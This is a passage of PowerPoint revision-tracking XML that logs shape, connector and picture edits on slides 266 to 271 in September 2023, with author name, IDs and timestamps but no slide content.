            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="12" creationId="{8F95AAF2-37F3-3C7D-232B-5AC7D24F27E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:01:04.068" v="2518" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:cxnSpMk id="7" creationId="{2E1E4B5F-42B8-9098-5CB8-7E9774CF35A9}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:01:45.904" v="2529" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:cxnSpMk id="10" creationId="{996C4643-52F1-0CFD-1ADF-72C091DA4300}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:35:07.233" v="3975" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:cxnSpMk id="14" creationId="{607EB9E6-8F27-FC86-B85C-D8AED0C92F9C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:35:23.415" v="3980" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:cxnSpMk id="15" creationId="{90A21D56-21FB-E3F0-E6F7-05D4A19AFFAA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:35:26.058" v="3981" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:cxnSpMk id="16" creationId="{E937AFAA-B291-320C-69B5-B7B16272DD74}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:07:01.090" v="2736" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1195303342" sldId="267"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T14:19:12.396" v="2081"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1195303342" sldId="267"/>
            <ac:spMk id="2" creationId="{88F237C8-CDBE-B05D-E2AC-FB6AF60DB490}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:07:01.090" v="2736" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1195303342" sldId="267"/>
            <ac:spMk id="3" creationId="{C89ECC1F-0F8A-9730-15FF-596ABA9AD629}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T12:38:29.252" v="4659" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1120616215" sldId="268"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T12:38:29.252" v="4659" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1120616215" sldId="268"/>
            <ac:picMk id="3" creationId="{D648A943-8724-82F4-1ABD-6690497F20BB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:50:13.550" v="4511" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1120616215" sldId="268"/>
            <ac:picMk id="5" creationId="{DB16FE0C-3FBC-CC91-61C3-9A6F55CE5F26}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-13T00:50:39.380" v="4518" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1120616215" sldId="268"/>
            <ac:picMk id="7" creationId="{67C87EFE-F19B-2204-8E2E-82A87598BECC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:45.701" v="4239" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2407935219" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:35:49.804" v="3935" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="2" creationId="{1E3424C7-626E-0FC9-0857-74E6C734CEDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:32:22.671" v="3868" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="3" creationId="{8B1187A1-F1E9-F1A4-F3EB-299A4968037D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T15:18:25.620" v="2335" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="3" creationId="{FE352539-F77A-6C5F-801C-23CF491E1922}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:16.194" v="4232" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="5" creationId="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:02:20.200" v="3579" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="6" creationId="{CE4E3A7D-8A9F-EB52-1DB8-3FFB3C8BC883}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:52:45.417" v="3405" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="7" creationId="{F6052CCF-E095-ECB0-7A66-070C5A52BBB2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:44.094" v="4238" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="11" creationId="{94564524-A32E-7E6C-35D3-E16DAA87D4FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T16:10:50.553" v="2457"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="14" creationId="{A9747749-DF5B-BF4D-B096-EB6C07BED92B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T23:53:53.762" v="2563" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="16" creationId="{ADFAAB13-B34B-C299-BDD6-CD1CC11A338F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:31.931" v="4236" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="18" creationId="{F3D2A13F-EA4A-668C-A779-B4166BE44E3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:26.853" v="4234" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="23" creationId="{37157EF8-8FE6-3AC5-3D71-9BE38A7A6A18}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:02:14.298" v="3572" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="26" creationId="{9F0F7336-B743-13A3-C4C2-85805E8E2FED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:11:53.391" v="3642" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:spMk id="32" creationId="{23FE1C97-2150-6767-2064-D486D09EA6D3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:38.892" v="4237" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="8" creationId="{B246AB5C-852C-EC61-43A8-0866142760EC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:52:45.417" v="3405" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="9" creationId="{D45D8E3C-0F82-9AD4-0DBB-7815D237BAB7}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:45.701" v="4239" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="13" creationId="{C790502C-34A4-2ADA-6F91-F337DA3AABEC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:31.931" v="4236" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="19" creationId="{19141EF8-349D-8905-903D-FDEF334070A4}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:29:29.159" v="4235" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="24" creationId="{E9E52C2A-4971-D11D-3BD6-E62CC364FFF8}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:02:14.298" v="3572" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="27" creationId="{9B28A323-685C-63D9-F51B-6B52EBF1C62B}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:11:49.406" v="3641" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2407935219" sldId="269"/>
            <ac:cxnSpMk id="34" creationId="{3868316A-70DE-4C74-D0EA-988151372C4C}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:22:01.270" v="3715" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1232280391" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:20:44.394" v="3711" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="2" creationId="{1E3424C7-626E-0FC9-0857-74E6C734CEDA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:19:58.923" v="3710" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="3" creationId="{C0D5E9EE-AF3B-97A7-F65B-7100CBA0A89C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:14:19.316" v="3644" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="5" creationId="{0C419B23-DE17-334B-7E88-8FD6D5E5229C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:05:39.046" v="3586" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="7" creationId="{F6052CCF-E095-ECB0-7A66-070C5A52BBB2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:05:42.707" v="3588" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="11" creationId="{94564524-A32E-7E6C-35D3-E16DAA87D4FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:14:19.316" v="3644" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:spMk id="16" creationId="{ADFAAB13-B34B-C299-BDD6-CD1CC11A338F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:05:40.222" v="3587" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:cxnSpMk id="9" creationId="{D45D8E3C-0F82-9AD4-0DBB-7815D237BAB7}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:08:45.795" v="3606" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1232280391" sldId="270"/>
            <ac:cxnSpMk id="13" creationId="{C790502C-34A4-2ADA-6F91-F337DA3AABEC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:27:40.570" v="4230" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="424324840" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:12:32.867" v="2738" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="2" creationId="{83F885D5-7AD5-8FF7-8D57-C35AE9448B5E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:12:32.867" v="2738" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="3" creationId="{F1D8E3E2-BB57-C1DA-2B0D-5F7BF628FE36}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:20:58.595" v="3057" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="6" creationId="{C1FC332C-1287-84E8-1332-888DB0DFF7C8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:20:53.733" v="3056" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="7" creationId="{339959C1-F5BB-5DA4-5E56-5D0BCAF4C2B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:20:53.733" v="3056" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="8" creationId="{2516E8B0-1AA6-5C2C-97CD-AC8E9044ADED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T00:29:26.300" v="3132" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="9" creationId="{BE56A390-19A0-E347-C869-2AD181415A34}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:52:30.979" v="4200" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:spMk id="10" creationId="{321640E4-2D31-FB06-8F47-AD0DA7291579}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:57:31.414" v="4211" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="5" creationId="{C797F6B4-DC59-1555-6D41-8BA8C4CDF0DA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:56:19.583" v="4203" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1026" creationId="{E59D3E62-378F-97AC-159E-4410C116F371}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:56:52.023" v="4207" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1028" creationId="{B9A9E371-8F82-CE30-220D-67D362258B10}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:26:01.996" v="4212" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1030" creationId="{DDF7551B-97D6-D3B7-7A4B-D5BA757EE17A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:26:43.318" v="4218" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1032" creationId="{3F2854EA-A251-66BE-B270-5F189315A2A6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:27:03.760" v="4220"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1034" creationId="{7F930345-FC2D-103E-0D4B-E64F0A3D7533}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T14:27:40.570" v="4230" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="424324840" sldId="271"/>
            <ac:picMk id="1036" creationId="{A787BE7C-DAD5-C351-ACD7-CF831FCDE8A1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
